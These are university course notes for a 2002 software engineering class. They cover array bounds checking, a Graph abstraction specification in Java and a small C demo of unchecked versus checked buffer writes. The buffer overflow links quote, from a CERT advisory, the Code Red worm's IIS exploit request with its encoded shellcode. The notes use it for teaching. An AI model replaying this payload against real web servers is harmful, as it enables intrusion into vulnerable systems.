CS201J: Engineering Software, Fall 2002
Notes: Thursday 12 September 2002
Assignments Due
- 12 September: Read Ch 5.3-5.10
- 19 September: Problem Set 3
- Upcoming lab hours (Small Hall): Thursday, 5-7pm (Sol); 7-9pm (Tiffany); Sunday 4-6pm (Mike); Monday 6-8pm (Serge); Wednesday (18 Sept), 5-7pm (Sol); Wednesday (18 Sept), 8-9pm (Tiffany).
Notes and Questions
What are the advantages and disadvantages of each approach to array bounds errors:
- No checking (C)
- Run-time checking (Java)
- Static checking (ESC/Java)
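The first two approaches in the question above, as an added example that is not part of the original course notes: the same over-long input stored with no check and with a per-index run-time check. The `frame` model, the sizes and the function names are assumptions made for the illustration.

```c
#include <stdio.h>
#include <string.h>

#define BUF_LEN   16   /* constructed buffer size */
#define SAVED_LEN 8    /* constructed stand-in for whatever is stored next */

/* Adjacent memory modelled as ONE array, so the demo never leaves a real C
   object: mem[0..15] is the buffer, mem[16..23] the value stored after it. */
struct frame { unsigned char mem[BUF_LEN + SAVED_LEN]; };

void frame_init(struct frame *f) {
    memset(f->mem, 0, BUF_LEN);
    memset(f->mem + BUF_LEN, 0xAA, SAVED_LEN);
}

/* Returns 1 while the value after the buffer still holds its initial bytes. */
int saved_intact(const struct frame *f) {
    for (size_t i = 0; i < SAVED_LEN; i++)
        if (f->mem[BUF_LEN + i] != 0xAA) return 0;
    return 1;
}

/* No checking: the index is never compared with BUF_LEN, so input longer than
   the buffer runs on into the neighbouring value (capped at the model's size). */
void store_unchecked(struct frame *f, const char *src, size_t len) {
    for (size_t i = 0; i < len && i < sizeof f->mem; i++)
        f->mem[i] = (unsigned char)src[i];
}

/* Run-time checking: each index is tested before the store and the operation
   fails at the first out-of-range one. Earlier in-range stores have already
   happened, as they would before a Java ArrayIndexOutOfBoundsException. */
int store_checked(struct frame *f, const char *src, size_t len) {
    for (size_t i = 0; i < len; i++) {
        if (i >= BUF_LEN) return -1;
        f->mem[i] = (unsigned char)src[i];
    }
    return 0;
}

int main(void) {
    struct frame f;
    char input[20];
    memset(input, 'N', sizeof input);   /* constructed over-long input */
    frame_init(&f); store_unchecked(&f, input, sizeof input);
    printf("unchecked: saved value intact = %d\n", saved_intact(&f));
    frame_init(&f);
    int r = store_checked(&f, input, sizeof input);
    printf("checked: result = %d, saved value intact = %d\n", r, saved_intact(&f));
    return 0;
}
```

Static checking, the third approach, would instead aim to reject the over-long call before the program ever runs.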
Graph Data Abstraction
In class Tuesday, we will work on implementing a Graph data abstraction that satisfies this specification:
public class Graph {
    // OVERVIEW:
    //    A Graph is a mutable type that represents an undirected
    //    graph. It consists of nodes that are named by Strings,
    //    and edges that connect a pair of nodes.
    //    A typical Graph is: < Nodes, Edges >
    //    where
    //       Nodes = { n1, n2, ..., nm }
    //    and
    //       Edges = { {from_1, to_1}, ..., {from_n, to_n} }

    // Creator
    public Graph ()
       // EFFECTS: Initializes this to a graph
       //    with no nodes or edges: < {}, {} >.

    // Mutators
    public void addNode (String name)
       // REQUIRES: name is not the name of a node in this
       // MODIFIES: this
       // EFFECTS: adds a node named name to this:
       //    this_post = < this_pre.nodes U { name }, this_pre.edges >

    public void addEdge (String fnode, String tnode)
       // REQUIRES: fnode and tnode are names of nodes in this.
       // MODIFIES: this
       // EFFECTS: Adds an edge from fnode to tnode to this:
       //    this_post = < this_pre.nodes, this_pre.edges U { {fnode, tnode} } >

    // Observers
    public boolean hasNode (String node)
       // EFFECTS: Returns true iff node is a node in this.

    public StringIterator nodes ()
       // EFFECTS: Returns the StringIterator that
       //    yields all nodes in this in arbitrary order.

    StringSet getNeighbors (String node)
       // REQUIRES: node is a node in this
       // EFFECTS: Returns the StringSet consisting of all nodes in this
       //    that are directly connected to node:
       //    \result = { n | {node, n} is in this.edges }
}

Links
Buffer Overflows
- CAIDA Analysis of Code Red
- CERT Advisory. The request that exploits the buffer overflow vulnerability: /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c
3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
- Smashing the Stack for Fun and Profit, Aleph One
- Improving Security Using Extensible Lightweight Static Analysis (David Evans and David Larochelle), IEEE Software, Jan/Feb 2002.
Run-Time Exceptions
- Reports on the Ariane 5 run-time exception: Lions Report (official inquiry); Jean-Marc Jézéquel and Bertrand Meyer; Stephen Marshall (includes video of explosion)
Our recommendation now is the same as our recommendation a month ago, if you haven't patched your software, do so now.
Scott Culp, security program manager for Microsoft's security response center
University of Virginia Department of Computer Science, CS 201J: Engineering Software
Sponsored by the National Science Foundation
cs201j-staff@cs.virginia.edu